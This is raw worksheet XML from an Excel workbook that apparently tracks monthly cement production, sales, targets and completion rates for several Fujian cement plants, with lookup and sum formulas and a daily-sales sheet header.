      <c r="U13" s="133"/>
      <c r="V13" s="133"/>
      <c r="W13" s="133"/>
      <c r="X13" s="133"/>
    </row>
    <row r="14" customHeight="1" spans="2:32">
      <c r="B14" s="112"/>
      <c r="C14" s="96" t="s">
        <v>354</v>
      </c>
      <c r="D14" s="101">
        <f>[13]月报!$F$21</f>
        <v>60840.1700000003</v>
      </c>
      <c r="E14" s="101">
        <f>[13]月报!$G$21</f>
        <v>1444407.42</v>
      </c>
      <c r="F14" s="102">
        <v>1852600</v>
      </c>
      <c r="G14" s="103">
        <f>$E$14/$F$14*100</f>
        <v>77.966502213106</v>
      </c>
      <c r="H14" s="113"/>
      <c r="I14" s="113"/>
      <c r="J14" s="113"/>
      <c r="K14" s="132"/>
      <c r="L14" s="122"/>
      <c r="M14" s="122"/>
      <c r="N14" s="122"/>
      <c r="O14" s="107">
        <f>[13]月报!$Y$93</f>
        <v>25058.433</v>
      </c>
      <c r="P14" s="116"/>
      <c r="Q14" s="107">
        <f t="shared" si="0"/>
        <v>25058.433</v>
      </c>
      <c r="R14" s="109">
        <f>12+1.5</f>
        <v>13.5</v>
      </c>
      <c r="S14" s="110">
        <f>(O14)/R14*100/10000</f>
        <v>18.5618022222222</v>
      </c>
      <c r="U14" s="133"/>
      <c r="V14" s="133"/>
      <c r="W14" s="134"/>
      <c r="X14" s="134"/>
    </row>
    <row r="15" s="71" customFormat="1" customHeight="1" spans="2:32">
      <c r="B15" s="112"/>
      <c r="C15" s="135" t="s">
        <v>355</v>
      </c>
      <c r="D15" s="101"/>
      <c r="E15" s="101"/>
      <c r="F15" s="102"/>
      <c r="G15" s="103"/>
      <c r="H15" s="120"/>
      <c r="I15" s="120"/>
      <c r="J15" s="120"/>
      <c r="K15" s="136"/>
      <c r="L15" s="137"/>
      <c r="M15" s="137"/>
      <c r="N15" s="137"/>
      <c r="O15" s="107">
        <f>[13]月报!$Y$94</f>
        <v>7500</v>
      </c>
      <c r="P15" s="123"/>
      <c r="Q15" s="107">
        <f t="shared" si="0"/>
        <v>7500</v>
      </c>
      <c r="R15" s="109">
        <f>0.26*3+0.26</f>
        <v>1.04</v>
      </c>
      <c r="S15" s="110">
        <f>(O15)/R15*100/10000</f>
        <v>72.1153846153846</v>
      </c>
      <c r="T15" s="72"/>
      <c r="U15" s="133"/>
      <c r="V15" s="133"/>
      <c r="W15" s="134"/>
      <c r="X15" s="134"/>
      <c r="Y15" s="72"/>
      <c r="Z15" s="72"/>
      <c r="AA15" s="72"/>
      <c r="AB15" s="72"/>
      <c r="AC15" s="72"/>
      <c r="AD15" s="72"/>
      <c r="AE15" s="72"/>
      <c r="AF15" s="72"/>
    </row>
    <row r="16" customHeight="1" spans="2:32">
      <c r="B16" s="112"/>
      <c r="C16" s="96" t="s">
        <v>345</v>
      </c>
      <c r="D16" s="138">
        <f ca="1">SUM(D10:D12)+D7</f>
        <v>227074.170000001</v>
      </c>
      <c r="E16" s="138">
        <f ca="1">SUM(E10:E12)+E7</f>
        <v>5169465.42</v>
      </c>
      <c r="F16" s="139">
        <v>6008800</v>
      </c>
      <c r="G16" s="140">
        <f ca="1">$E$16/$F$16*100</f>
        <v>86.0315773532153</v>
      </c>
      <c r="H16" s="141">
        <f>SUM(H7:H12)</f>
        <v>9668.522</v>
      </c>
      <c r="I16" s="141">
        <f>SUM(I7:I12)</f>
        <v>124489.579</v>
      </c>
      <c r="J16" s="141">
        <v>100000</v>
      </c>
      <c r="K16" s="142">
        <f>$I$16/$J$16*100</f>
        <v>124.489579</v>
      </c>
      <c r="L16" s="143">
        <f ca="1">SUM(L7:L12)+L19</f>
        <v>0</v>
      </c>
      <c r="M16" s="143">
        <f ca="1">SUM(M7:M12)+M19</f>
        <v>0</v>
      </c>
      <c r="N16" s="143">
        <f ca="1">SUM(N7:N12)+N19</f>
        <v>0</v>
      </c>
      <c r="O16" s="144">
        <f ca="1">SUM(O7:O12)-O8-O9</f>
        <v>167674.501000051</v>
      </c>
      <c r="P16" s="144">
        <f>P7+P10+P11+P12+P17</f>
        <v>41550</v>
      </c>
      <c r="Q16" s="144">
        <f ca="1">SUM(Q7:Q12)-Q8-Q9</f>
        <v>126124.501000051</v>
      </c>
      <c r="R16" s="145">
        <f>SUM(R7:R12)-R8-R9</f>
        <v>48.89</v>
      </c>
      <c r="S16" s="146">
        <f ca="1">(O16-V3-V4-V5-V6)/R16*100/10000</f>
        <v>25.7976070771223</v>
      </c>
      <c r="U16" s="133"/>
      <c r="V16" s="133"/>
      <c r="W16" s="134"/>
      <c r="X16" s="134"/>
    </row>
    <row r="17" customHeight="1" spans="2:24">
      <c r="B17" s="112"/>
      <c r="C17" s="96" t="s">
        <v>349</v>
      </c>
      <c r="D17" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!h62")+INDIRECT($R$4&amp;"!h63")</f>
        <v>89402.228</v>
      </c>
      <c r="E17" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I62")+INDIRECT($R$4&amp;"!I63")</f>
        <v>925395.684</v>
      </c>
      <c r="F17" s="125"/>
      <c r="G17" s="126"/>
      <c r="H17" s="147"/>
      <c r="I17" s="147"/>
      <c r="J17" s="147"/>
      <c r="K17" s="148"/>
      <c r="L17" s="149">
        <f ca="1">INDIRECT($R$4&amp;"!G73")</f>
        <v>0</v>
      </c>
      <c r="M17" s="149">
        <f ca="1">INDIRECT($R$4&amp;"!H73")</f>
        <v>0</v>
      </c>
      <c r="N17" s="149">
        <f ca="1">INDIRECT($R$4&amp;"!I73")</f>
        <v>0</v>
      </c>
      <c r="O17" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M62")+INDIRECT($R$4&amp;"!M63")</f>
        <v>19995.862</v>
      </c>
      <c r="P17" s="107">
        <f>ROUND([14]月报!$T$44,0)</f>
        <v>0</v>
      </c>
      <c r="Q17" s="107">
        <f ca="1">O17-P17</f>
        <v>19995.862</v>
      </c>
      <c r="R17" s="130">
        <f>2.8-0.3</f>
        <v>2.5</v>
      </c>
      <c r="S17" s="110">
        <f ca="1">(O17-V7)/R17*100/10000</f>
        <v>79.983448</v>
      </c>
      <c r="U17" s="133"/>
      <c r="V17" s="133"/>
      <c r="W17" s="134"/>
      <c r="X17" s="134"/>
    </row>
    <row r="18" customHeight="1" spans="2:24">
      <c r="B18" s="112"/>
      <c r="C18" s="96" t="s">
        <v>321</v>
      </c>
      <c r="D18" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!h69")+INDIRECT($R$4&amp;"!h70")</f>
        <v>0</v>
      </c>
      <c r="E18" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I69")+INDIRECT($R$4&amp;"!I70")</f>
        <v>0</v>
      </c>
      <c r="F18" s="125"/>
      <c r="G18" s="126"/>
      <c r="H18" s="147"/>
      <c r="I18" s="147"/>
      <c r="J18" s="147"/>
      <c r="K18" s="148"/>
      <c r="L18" s="149"/>
      <c r="M18" s="149"/>
      <c r="N18" s="149"/>
      <c r="O18" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M69")+INDIRECT($R$4&amp;"!M70")</f>
        <v>467.66</v>
      </c>
      <c r="P18" s="107"/>
      <c r="Q18" s="107"/>
      <c r="R18" s="130">
        <v>5</v>
      </c>
      <c r="S18" s="110">
        <f ca="1">(O18)/R18*100/10000</f>
        <v>0.93532</v>
      </c>
      <c r="U18" s="133"/>
      <c r="V18" s="133"/>
      <c r="W18" s="134"/>
      <c r="X18" s="134"/>
    </row>
    <row r="19" customHeight="1" spans="2:24">
      <c r="B19" s="112"/>
      <c r="C19" s="96" t="s">
        <v>356</v>
      </c>
      <c r="D19" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!H80")</f>
        <v>0</v>
      </c>
      <c r="E19" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I80")</f>
        <v>0</v>
      </c>
      <c r="F19" s="102"/>
      <c r="G19" s="103"/>
      <c r="H19" s="120"/>
      <c r="I19" s="120"/>
      <c r="J19" s="120">
        <v>0</v>
      </c>
      <c r="K19" s="128" t="e">
        <f>$I$8/$J$8*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L19" s="122"/>
      <c r="M19" s="122"/>
      <c r="N19" s="122"/>
      <c r="O19" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M80")</f>
        <v>0</v>
      </c>
      <c r="P19" s="150"/>
      <c r="Q19" s="107">
        <f ca="1">O19</f>
        <v>0</v>
      </c>
      <c r="R19" s="109">
        <v>10</v>
      </c>
      <c r="S19" s="110">
        <f ca="1">(O19)/R19*100/10000</f>
        <v>0</v>
      </c>
      <c r="U19" s="133"/>
      <c r="V19" s="133"/>
      <c r="W19" s="134"/>
      <c r="X19" s="134"/>
    </row>
    <row r="20" customHeight="1" spans="2:24">
      <c r="B20" s="100" t="s">
        <v>357</v>
      </c>
      <c r="C20" s="96" t="s">
        <v>312</v>
      </c>
      <c r="D20" s="151">
        <f ca="1" t="shared" ref="D20:I20" si="1">D21+D22</f>
        <v>231999.78</v>
      </c>
      <c r="E20" s="151">
        <f ca="1" t="shared" si="1"/>
        <v>2488566.25</v>
      </c>
      <c r="F20" s="151">
        <v>2320000</v>
      </c>
      <c r="G20" s="152">
        <f ca="1">$E$20/$F$20*100</f>
        <v>107.265786637931</v>
      </c>
      <c r="H20" s="147">
        <f t="shared" si="1"/>
        <v>247973.89</v>
      </c>
      <c r="I20" s="147">
        <f t="shared" si="1"/>
        <v>2321299.26</v>
      </c>
      <c r="J20" s="147">
        <v>2320000</v>
      </c>
      <c r="K20" s="148">
        <f>$I$20/$J$20*100</f>
        <v>100.056002586207</v>
      </c>
      <c r="L20" s="151">
        <f t="shared" ref="L20:O20" si="2">L21+L22</f>
        <v>0</v>
      </c>
      <c r="M20" s="151">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="N20" s="151">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="O20" s="107">
        <f ca="1" t="shared" si="2"/>
        <v>55786.2</v>
      </c>
      <c r="P20" s="107"/>
      <c r="Q20" s="107"/>
      <c r="R20" s="130">
        <f>4.6+(0.6*8+1.2)+0.05*5+0.1+0.9</f>
        <v>11.85</v>
      </c>
      <c r="S20" s="110">
        <f ca="1">O20/R20*100/10000</f>
        <v>47.0769620253164</v>
      </c>
      <c r="U20" s="133"/>
      <c r="V20" s="133"/>
      <c r="W20" s="134"/>
      <c r="X20" s="134"/>
    </row>
    <row r="21" customHeight="1" spans="2:24">
      <c r="B21" s="112"/>
      <c r="C21" s="96" t="s">
        <v>358</v>
      </c>
      <c r="D21" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H21")</f>
        <v>215822</v>
      </c>
      <c r="E21" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I21")</f>
        <v>2325260</v>
      </c>
      <c r="F21" s="153">
        <v>2170000</v>
      </c>
      <c r="G21" s="152">
        <f ca="1">$E$21/$F$21*100</f>
        <v>107.154838709677</v>
      </c>
      <c r="H21" s="147">
        <f>VLOOKUP("安砂",日销售量,(33),FALSE)</f>
        <v>232802.39</v>
      </c>
      <c r="I21" s="147">
        <f>VLOOKUP("安砂",日销售量,(34),FALSE)</f>
        <v>2163275.81</v>
      </c>
      <c r="J21" s="127">
        <v>2170000</v>
      </c>
      <c r="K21" s="148">
        <f>$I$21/$J$21*100</f>
        <v>99.6901294930876</v>
      </c>
      <c r="L21" s="154"/>
      <c r="M21" s="154"/>
      <c r="N21" s="154"/>
      <c r="O21" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M21")</f>
        <v>49895.14</v>
      </c>
      <c r="P21" s="155" t="s">
        <v>359</v>
      </c>
      <c r="Q21" s="155" t="s">
        <v>360</v>
      </c>
      <c r="R21" s="130">
        <f>4.6+(0.6*8+1.2)+0.05*5+0.1</f>
        <v>10.95</v>
      </c>
      <c r="S21" s="110">
        <f ca="1">O21/R21*100/10000</f>
        <v>45.5663378995434</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:24">
      <c r="B22" s="112"/>
      <c r="C22" s="96" t="s">
        <v>361</v>
      </c>
      <c r="D22" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H79")</f>
        <v>16177.78</v>
      </c>
      <c r="E22" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I79")</f>
        <v>163306.25</v>
      </c>
      <c r="F22" s="153">
        <v>150000</v>
      </c>
      <c r="G22" s="152">
        <f ca="1">$E$22/$F$22*100</f>
        <v>108.870833333333</v>
      </c>
      <c r="H22" s="147">
        <f>VLOOKUP("安砂德化",日销售量,(33),FALSE)</f>
        <v>15171.5</v>
      </c>
      <c r="I22" s="147">
        <f>VLOOKUP("安砂德化",日销售量,(34),FALSE)</f>
        <v>158023.45</v>
      </c>
      <c r="J22" s="127">
        <v>150000</v>
      </c>
      <c r="K22" s="148">
        <f>$I$22/$J$22*100</f>
        <v>105.348966666667</v>
      </c>
      <c r="L22" s="154"/>
      <c r="M22" s="154"/>
      <c r="N22" s="154"/>
      <c r="O22" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M79")</f>
        <v>5891.06</v>
      </c>
      <c r="P22" s="155" t="s">
        <v>229</v>
      </c>
      <c r="Q22" s="155">
        <f>月报!Z38+月报!Z37</f>
        <v>7357.671</v>
      </c>
      <c r="R22" s="130">
        <v>0.9</v>
      </c>
      <c r="S22" s="110">
        <f ca="1">O22/R22*100/10000</f>
        <v>65.4562222222222</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:24">
      <c r="B23" s="112"/>
      <c r="C23" s="96" t="s">
        <v>352</v>
      </c>
      <c r="D23" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H31")</f>
        <v>137253</v>
      </c>
      <c r="E23" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I31")</f>
        <v>1510260</v>
      </c>
      <c r="F23" s="153">
        <v>1820000</v>
      </c>
      <c r="G23" s="152">
        <f ca="1">$E$23/$F$23*100</f>
        <v>82.9813186813187</v>
      </c>
      <c r="H23" s="147">
        <f>VLOOKUP(C23,日销售量,(33),FALSE)</f>
        <v>153523.14</v>
      </c>
      <c r="I23" s="147">
        <f>VLOOKUP(C23,日销售量,(34),FALSE)</f>
        <v>1520294.32</v>
      </c>
      <c r="J23" s="127">
        <v>1820000</v>
      </c>
      <c r="K23" s="148">
        <f>$I$23/$J$23*100</f>
        <v>83.5326549450549</v>
      </c>
      <c r="L23" s="154"/>
      <c r="M23" s="154"/>
      <c r="N23" s="154"/>
      <c r="O23" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M31")</f>
        <v>49159.23</v>
      </c>
      <c r="P23" s="155" t="s">
        <v>237</v>
      </c>
      <c r="Q23" s="155">
        <f>月报!Z42+月报!Z41</f>
        <v>4725.137</v>
      </c>
      <c r="R23" s="130">
        <f>7.862</f>
        <v>7.862</v>
      </c>
      <c r="S23" s="110">
        <f ca="1" t="shared" ref="S23:S28" si="3">O23/R23*100/10000</f>
        <v>62.5276392775375</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:24">
      <c r="B24" s="112"/>
      <c r="C24" s="96" t="s">
        <v>304</v>
      </c>
      <c r="D24" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H51")</f>
        <v>136470</v>
      </c>
      <c r="E24" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I51")</f>
        <v>1512869</v>
      </c>
      <c r="F24" s="153">
        <v>2180000</v>
      </c>
      <c r="G24" s="152">
        <f ca="1">$E$24/$F$24*100</f>
        <v>69.3976605504587</v>
      </c>
      <c r="H24" s="147">
        <f>VLOOKUP(C24,日销售量,(33),FALSE)</f>
        <v>148965.015</v>
      </c>
      <c r="I24" s="147">
        <f>VLOOKUP(C24,日销售量,(34),FALSE)</f>
        <v>1520142.101</v>
      </c>
      <c r="J24" s="127">
        <v>2180000</v>
      </c>
      <c r="K24" s="148">
        <f>$I$24/$J$24*100</f>
        <v>69.7312890366972</v>
      </c>
      <c r="L24" s="154"/>
      <c r="M24" s="154"/>
      <c r="N24" s="154"/>
      <c r="O24" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M51")</f>
        <v>36357.6689999998</v>
      </c>
      <c r="P24" s="155" t="s">
        <v>304</v>
      </c>
      <c r="Q24" s="155">
        <f>月报!Z49+月报!Z50</f>
        <v>2798.62500000004</v>
      </c>
      <c r="R24" s="130">
        <f>3.725+1.2+1.2+2.4</f>
        <v>8.525</v>
      </c>
      <c r="S24" s="110">
        <f ca="1" t="shared" si="3"/>
        <v>42.6482920821112</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:24">
      <c r="B25" s="112"/>
      <c r="C25" s="96" t="s">
        <v>348</v>
      </c>
      <c r="D25" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H41")</f>
        <v>24414</v>
      </c>
      <c r="E25" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I41")</f>
        <v>149390</v>
      </c>
      <c r="F25" s="153">
        <v>200000</v>
      </c>
      <c r="G25" s="152">
        <f ca="1">$E$25/$F$25*100</f>
        <v>74.695</v>
      </c>
      <c r="H25" s="147">
        <f>VLOOKUP(C25,日销售量,(33),FALSE)</f>
        <v>27253.05</v>
      </c>
      <c r="I25" s="147">
        <f>VLOOKUP(C25,日销售量,(34),FALSE)</f>
        <v>149541.19</v>
      </c>
      <c r="J25" s="127">
        <v>200000</v>
      </c>
      <c r="K25" s="148">
        <f>$I$25/$J$25*100</f>
        <v>74.770595</v>
      </c>
      <c r="L25" s="154"/>
      <c r="M25" s="154"/>
      <c r="N25" s="154"/>
      <c r="O25" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M41")</f>
        <v>23290.71</v>
      </c>
      <c r="P25" s="155" t="s">
        <v>345</v>
      </c>
      <c r="Q25" s="155">
        <f>Q22+Q23+Q24</f>
        <v>14881.433</v>
      </c>
      <c r="R25" s="130">
        <v>3.376</v>
      </c>
      <c r="S25" s="110">
        <f ca="1" t="shared" si="3"/>
        <v>68.9890699052133</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:24">
      <c r="B26" s="112"/>
      <c r="C26" s="96" t="s">
        <v>349</v>
      </c>
      <c r="D26" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H61")</f>
        <v>122026</v>
      </c>
      <c r="E26" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I61")</f>
        <v>1237899</v>
      </c>
      <c r="F26" s="153">
        <v>1250000</v>
      </c>
      <c r="G26" s="152">
        <f ca="1">$E$26/$F$26*100</f>
        <v>99.03192</v>
      </c>
      <c r="H26" s="147">
        <f>VLOOKUP(C26,日销售量,(33),FALSE)</f>
        <v>122182</v>
      </c>
      <c r="I26" s="147">
        <f>VLOOKUP(C26,日销售量,(34),FALSE)</f>
        <v>1232208.52</v>
      </c>
      <c r="J26" s="127">
        <v>1250000</v>
      </c>
      <c r="K26" s="148">
        <f>$I$26/$J$26*100</f>
        <v>98.5766816</v>
      </c>
      <c r="L26" s="154"/>
      <c r="M26" s="154"/>
      <c r="N26" s="154"/>
      <c r="O26" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M61")</f>
        <v>37613.1699999999</v>
      </c>
      <c r="P26" s="107"/>
      <c r="Q26" s="107"/>
      <c r="R26" s="130">
        <v>5.2</v>
      </c>
      <c r="S26" s="110">
        <f ca="1" t="shared" si="3"/>
        <v>72.333019230769</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:24">
      <c r="B27" s="112"/>
      <c r="C27" s="96" t="s">
        <v>321</v>
      </c>
      <c r="D27" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!H68")</f>
        <v>0</v>
      </c>
      <c r="E27" s="151">
        <f ca="1">INDIRECT($R$4&amp;"!I68")</f>
        <v>0</v>
      </c>
      <c r="F27" s="153">
        <v>0</v>
      </c>
      <c r="G27" s="152" t="e">
        <f ca="1">$E$27/$F$27*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="H27" s="147">
        <f>VLOOKUP(C27,日销售量,(33),FALSE)</f>
        <v>0</v>
      </c>
      <c r="I27" s="147">
        <f>VLOOKUP(C27,日销售量,(34),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J27" s="127">
        <v>0</v>
      </c>
      <c r="K27" s="148" t="e">
        <f>$I$27/$J$27*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L27" s="154"/>
      <c r="M27" s="154"/>
      <c r="N27" s="154"/>
      <c r="O27" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M68")</f>
        <v>1502.56</v>
      </c>
      <c r="P27" s="107"/>
      <c r="Q27" s="107"/>
      <c r="R27" s="130">
        <v>2.3</v>
      </c>
      <c r="S27" s="110">
        <f ca="1" t="shared" si="3"/>
        <v>6.53286956521739</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:24">
      <c r="B28" s="156"/>
      <c r="C28" s="96" t="s">
        <v>345</v>
      </c>
      <c r="D28" s="157">
        <f ca="1">SUM(D20:D27)-D20-D22</f>
        <v>635985</v>
      </c>
      <c r="E28" s="157">
        <f ca="1">SUM(E20:E27)-E20-E22</f>
        <v>6735678</v>
      </c>
      <c r="F28" s="157">
        <v>7770000</v>
      </c>
      <c r="G28" s="158">
        <f ca="1">$E$28/$F$28*100</f>
        <v>86.6882625482626</v>
      </c>
      <c r="H28" s="159">
        <f t="shared" ref="H28:I28" si="4">SUM(H20:H27)-H20</f>
        <v>699897.095</v>
      </c>
      <c r="I28" s="159">
        <f t="shared" si="4"/>
        <v>6743485.391</v>
      </c>
      <c r="J28" s="159">
        <v>7770000</v>
      </c>
      <c r="K28" s="160">
        <f>$I$28/$J$28*100</f>
        <v>86.7887437709138</v>
      </c>
      <c r="L28" s="143"/>
      <c r="M28" s="143"/>
      <c r="N28" s="143"/>
      <c r="O28" s="144">
        <f ca="1">SUM(O20:O27)-O20</f>
        <v>203709.539</v>
      </c>
      <c r="P28" s="144"/>
      <c r="Q28" s="144"/>
      <c r="R28" s="161">
        <f>SUM(R21:R27)</f>
        <v>39.113</v>
      </c>
      <c r="S28" s="146">
        <f ca="1" t="shared" si="3"/>
        <v>52.082309973666</v>
      </c>
    </row>
    <row r="29" ht="105" customHeight="1" spans="2:24">
      <c r="B29" s="162" t="s">
        <v>286</v>
      </c>
      <c r="C29" s="163"/>
      <c r="D29" s="164" t="str">
        <f ca="1">"1."&amp;INDIRECT($R$4&amp;"!P56")&amp;"："&amp;INDIRECT($R$4&amp;"!Q56")&amp;CHAR(10)&amp;"2."&amp;INDIRECT($R$4&amp;"!P59")&amp;"："&amp;INDIRECT($R$4&amp;"!Q59")&amp;CHAR(10)&amp;"3."&amp;INDIRECT($R$4&amp;"!P62")&amp;"："&amp;INDIRECT($R$4&amp;"!Q62")&amp;CHAR(10)&amp;"4."&amp;INDIRECT($R$4&amp;"!P65")&amp;"："&amp;INDIRECT($R$4&amp;"!Q65")&amp;CHAR(10)&amp;"5."&amp;INDIRECT($R$4&amp;"!P68")&amp;"："&amp;INDIRECT($R$4&amp;"!Q68")&amp;CHAR(10)&amp;"6."&amp;INDIRECT($R$4&amp;"!P71")&amp;"："&amp;INDIRECT($R$4&amp;"!Q71")&amp;CHAR(10)&amp;"7."&amp;INDIRECT($R$4&amp;"!P74")&amp;"："&amp;INDIRECT($R$4&amp;"!Q74")&amp;CHAR(10)</f>
        <v>1.安砂建福：
2.永安建福：
3.金银湖水泥：
4.顺昌炼石：
5.福州炼石：
6.宁德建福：
7.安砂建福德化：
</v>
      </c>
      <c r="E29" s="165"/>
      <c r="F29" s="165"/>
      <c r="G29" s="165"/>
      <c r="H29" s="165"/>
      <c r="I29" s="165"/>
      <c r="J29" s="165"/>
      <c r="K29" s="165"/>
      <c r="L29" s="165"/>
      <c r="M29" s="165"/>
      <c r="N29" s="165"/>
      <c r="O29" s="165"/>
      <c r="P29" s="165"/>
      <c r="Q29" s="165"/>
      <c r="R29" s="165"/>
      <c r="S29" s="166"/>
    </row>
    <row r="33" spans="4:4">
      <c r="D33" s="167"/>
    </row>
    <row r="34" spans="4:4">
      <c r="D34" s="167"/>
    </row>
    <row r="35" ht="124.5" customHeight="1"/>
  </sheetData>
  <mergeCells count="28">
    <mergeCell ref="B2:S2"/>
    <mergeCell ref="D5:G5"/>
    <mergeCell ref="H5:K5"/>
    <mergeCell ref="L5:N5"/>
    <mergeCell ref="O5:Q5"/>
    <mergeCell ref="B29:C29"/>
    <mergeCell ref="D29:S29"/>
    <mergeCell ref="B7:B19"/>
    <mergeCell ref="B20:B28"/>
    <mergeCell ref="H7:H9"/>
    <mergeCell ref="H12:H15"/>
    <mergeCell ref="I7:I9"/>
    <mergeCell ref="I12:I15"/>
    <mergeCell ref="J7:J9"/>
    <mergeCell ref="J12:J15"/>
    <mergeCell ref="K7:K9"/>
    <mergeCell ref="K12:K15"/>
    <mergeCell ref="L7:L9"/>
    <mergeCell ref="L12:L14"/>
    <mergeCell ref="M7:M9"/>
    <mergeCell ref="M12:M14"/>
    <mergeCell ref="N7:N9"/>
    <mergeCell ref="N12:N14"/>
    <mergeCell ref="P7:P9"/>
    <mergeCell ref="P12:P15"/>
    <mergeCell ref="R5:R6"/>
    <mergeCell ref="S5:S6"/>
    <mergeCell ref="B5:C6"/>
  </mergeCells>
  <conditionalFormatting sqref="S7:S28">
    <cfRule type="cellIs" dxfId="0" priority="1" operator="greaterThan">
      <formula>95</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="2" operator="greaterThan">
      <formula>85</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="2" priority="3" stopIfTrue="1" operator="greaterThan">
      <formula>80</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>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2">
    <tabColor theme="7" tint="0.399884029663991"/>
  </sheetPr>
  <dimension ref="A1:AI19"/>
  <sheetViews>
    <sheetView zoomScale="75" zoomScaleNormal="75" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="H3" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="AG23" sqref="AG23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="12"/>
  <cols>
    <col min="1" max="1" width="13.875" style="54" customWidth="1"/>
    <col min="2" max="31" width="7.625" style="54" customWidth="1"/>
    <col min="32" max="33" width="9.25" style="54" customWidth="1"/>
    <col min="34" max="34" width="11.125" style="54" customWidth="1"/>
    <col min="35" max="35" width="12.5" style="54" customWidth="1"/>
    <col min="36" max="16384" width="9" style="54"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:35">
      <c r="A1" s="55" t="s">
        <v>365</v>
      </c>
      <c r="B1" s="55"/>
      <c r="C1" s="55"/>
      <c r="D1" s="55"/>
      <c r="E1" s="55"/>
      <c r="F1" s="55"/>
      <c r="G1" s="55"/>
      <c r="H1" s="55"/>
      <c r="I1" s="55"/>
      <c r="J1" s="56"/>
      <c r="K1" s="55"/>
      <c r="L1" s="55"/>
      <c r="M1" s="55"/>
      <c r="N1" s="55"/>
      <c r="O1" s="55"/>
      <c r="P1" s="55"/>
      <c r="Q1" s="55"/>
      <c r="R1" s="55"/>
      <c r="S1" s="55"/>
      <c r="T1" s="55"/>
      <c r="U1" s="55"/>
      <c r="V1" s="55"/>
      <c r="W1" s="55"/>
      <c r="X1" s="55"/>
      <c r="Y1" s="55"/>
      <c r="Z1" s="55"/>
      <c r="AA1" s="55"/>
      <c r="AB1" s="55"/>
      <c r="AC1" s="55"/>
      <c r="AD1" s="55"/>
      <c r="AE1" s="55"/>
    </row>
    <row r="2" ht="12.75" spans="1:35">
      <c r="A2" s="57" t="s">
        <v>366</v>
      </c>
      <c r="B2" s="57">
        <v>1</v>
      </c>
      <c r="C2" s="57">
        <v>2</v>
      </c>
      <c r="D2" s="57">
        <v>3</v>
      </c>
      <c r="E2" s="57">
        <v>4</v>
      </c>
      <c r="F2" s="57">
        <v>5</v>
      </c>
      <c r="G2" s="57">
        <v>6</v>
      </c>
      <c r="H2" s="57">
        <v>7</v>
      </c>
      <c r="I2" s="57">
        <v>8</v>
      </c>
      <c r="J2" s="58">
        <v>9</v>
      </c>
      <c r="K2" s="58">
        <v>10</v>
      </c>
      <c r="L2" s="58">
        <v>11</v>
      </c>
      <c r="M2" s="58">
        <v>12</v>
      </c>
      <c r="N2" s="58">
        <v>13</v>
      </c>
      <c r="O2" s="58">
        <v>14</v>
      </c>
      <c r="P2" s="58">
        <v>15</v>
      </c>
      <c r="Q2" s="58">
        <v>16</v>
      </c>
      <c r="R2" s="58">
        <v>17</v>
      </c>
      <c r="S2" s="58">
        <v>18</v>
      </c>
      <c r="T2" s="58">
        <v>19</v>
      </c>
      <c r="U2" s="58">
        <v>20</v>
      </c>
      <c r="V2" s="58">
        <v>21</v>
      </c>
      <c r="W2" s="58">
        <v>22</v>
      </c>
      <c r="X2" s="58">
        <v>23</v>
      </c>
      <c r="Y2" s="58">
        <v>24</v>
      </c>
      <c r="Z2" s="58">
        <v>25</v>
      </c>
      <c r="AA2" s="58">
        <v>26</v>
      </c>
      <c r="AB2" s="58">
        <v>27</v>
      </c>
      <c r="AC2" s="58">
        <v>28</v>
      </c>
      <c r="AD2" s="58">
        <v>29</v>
      </c>
      <c r="AE2" s="58">
        <v>30</v>
      </c>
      <c r="AF2" s="57">
        <v>31</v>
      </c>
      <c r="AG2" s="57" t="s">
        <v>367</v>
      </c>
      <c r="AH2" s="57" t="s">
        <v>368</v>
      </c>
      <c r="AI2" s="59" t="s">
        <v>369</v>
      </c>
    </row>
